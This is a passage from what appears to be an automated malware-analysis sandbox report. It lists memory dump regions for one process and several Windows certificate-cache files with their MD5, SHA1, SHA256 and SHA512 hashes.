memory/5468-566-0x0000000006740000-0x0000000006772000-memory.dmp
memory/5468-567-0x000000006FCF0000-0x000000006FD3C000-memory.dmp
memory/5468-577-0x0000000007360000-0x000000000737E000-memory.dmp
memory/5468-579-0x0000000007380000-0x0000000007423000-memory.dmp
memory/5468-608-0x0000000007B00000-0x000000000817A000-memory.dmp
memory/5468-609-0x00000000074C0000-0x00000000074DA000-memory.dmp
memory/5468-610-0x0000000007530000-0x000000000753A000-memory.dmp
memory/5468-612-0x0000000007740000-0x00000000077D6000-memory.dmp
memory/5468-613-0x00000000076C0000-0x00000000076D1000-memory.dmp
memory/5468-614-0x00000000076F0000-0x00000000076FE000-memory.dmp
memory/5468-615-0x0000000007700000-0x0000000007714000-memory.dmp
memory/5468-616-0x0000000007800000-0x000000000781A000-memory.dmp
memory/5468-617-0x00000000077E0000-0x00000000077E8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 50bb1575c1393d9a3697c3dae6fb2b6c |
| SHA1 | e874da64f63eff1d7c598524356642c3c5abf330 |
| SHA256 | c26fedfb02d6b14481a7fda78139830cf2cf6a0fd6a6ed4d032cebb119a5dee9 |
| SHA512 | 2f91fa27c36314f83634cba40d3db6f144843c3e7f28600c0f2458ab4fe0730705efc34e2ba830a423aff039ee2a19d8bcda08e00507cb27c3a11c7bd9d5d01b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | f0a512ec082edd72089e275e5c569d8b |
| SHA1 | d53c416f97e7f5d7884cb999e35344b69a662dec |
| SHA256 | 59fcc1cd8f0c6170b6f25a56aec14b60bafd15c5374b7a4a14c874003bae42dc |
| SHA512 | f71c6001864cb73f036c4cf4c5a0e477b6d9936dc5e681184cd60125e9689f65721981866687109d99b03268d08b2cf46962f6bd7baa884a1a464fd86cde0509 |